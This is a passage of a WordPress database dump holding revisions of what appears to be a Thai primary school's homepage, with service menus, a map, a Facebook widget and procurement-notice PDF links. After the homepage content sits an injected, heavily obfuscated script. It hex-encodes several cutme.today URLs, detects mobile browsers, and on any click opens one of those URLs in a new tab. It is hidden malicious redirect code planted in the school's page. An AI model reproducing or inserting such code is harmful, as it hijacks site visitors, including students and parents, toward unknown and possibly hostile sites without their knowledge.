{\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-23 09:12:34','2024-08-23 02:12:34','',14,'http://pakhaeng.ssk.in.th/?p=1058',0,'revision','',0),
(1059,1,'2024-08-23 14:33:14','2024-08-23 07:33:14','<!-- wp:file {\"id\":1060,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศประกาศผู้ชนะการเสนอราคา-ซื้ออุปกรณ์พัฒนาระบบรักษาความปลอดภัยในสถานศึกษา.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศประกาศผู้ชนะการเสนอราคา-ซื้ออุปกรณ์พัฒนาระบบรักษาความปลอดภัยในสถานศึกษา.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประกาศประกาศผู้ชนะการเสนอราคา ซื้ออุปกรณ์พัฒนาระบบรักษาความปลอดภัยในสถานศึกษา\"></object><a id=\"wp-block-file--media-258d47a4-e670-467f-ad74-d5da4b3921dc\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศประกาศผู้ชนะการเสนอราคา-ซื้ออุปกรณ์พัฒนาระบบรักษาความปลอดภัยในสถานศึกษา.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">ประกาศประกาศผู้ชนะการเสนอราคา ซื้ออุปกรณ์พัฒนาระบบรักษาความปลอดภัยในสถานศึกษา</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศประกาศผู้ชนะการเสนอราคา-ซื้ออุปกรณ์พัฒนาระบบรักษาความปลอดภัยในสถานศึกษา.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-258d47a4-e670-467f-ad74-d5da4b3921dc\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:file {\"id\":1061,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-ซื้อหนังสือเรียนฟรี-โดยวิธีเฉพาะเจาะจง.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-ซื้อหนังสือเรียนฟรี-โดยวิธีเฉพาะเจาะจง.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประกาศผู้ชนะการเสนอราคา ซื้อหนังสือเรียนฟรี โดยวิธีเฉพาะเจาะจง\"></object><a id=\"wp-block-file--media-b77f476c-3294-419a-b3c9-e37849ddba91\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-ซื้อหนังสือเรียนฟรี-โดยวิธีเฉพาะเจาะจง.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">ประกาศผู้ชนะการเสนอราคา ซื้อหนังสือเรียนฟรี โดยวิธีเฉพาะเจาะจง</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-ซื้อหนังสือเรียนฟรี-โดยวิธีเฉพาะเจาะจง.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-b77f476c-3294-419a-b3c9-e37849ddba91\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:file {\"id\":1062,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-จ้างปรับปรุงซ่อมแซมอาคารเรียน-อาคารประกอบและสิ่งก่อสร้างอื่น.pdf\",\"displayPreview\":true,\"backgroundColor\":\"white\"} -->\n<div class=\"wp-block-file has-white-background-color has-background\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-จ้างปรับปรุงซ่อมแซมอาคารเรียน-อาคารประกอบและสิ่งก่อสร้างอื่น.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประกาศผู้ชนะการเสนอราคา จ้างปรับปรุงซ่อมแซมอาคารเรียน อาคารประกอบและสิ่งก่อสร้างอื่น\"></object><a id=\"wp-block-file--media-de7b9fcc-20b3-46ff-842a-27798e4bf26e\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-จ้างปรับปรุงซ่อมแซมอาคารเรียน-อาคารประกอบและสิ่งก่อสร้างอื่น.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">ประกาศผู้ชนะการเสนอราคา จ้างปรับปรุงซ่อมแซมอาคารเรียน อาคารประกอบและสิ่งก่อสร้างอื่น</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-จ้างปรับปรุงซ่อมแซมอาคารเรียน-อาคารประกอบและสิ่งก่อสร้างอื่น.pdf\" class=\"wp-block-file__button 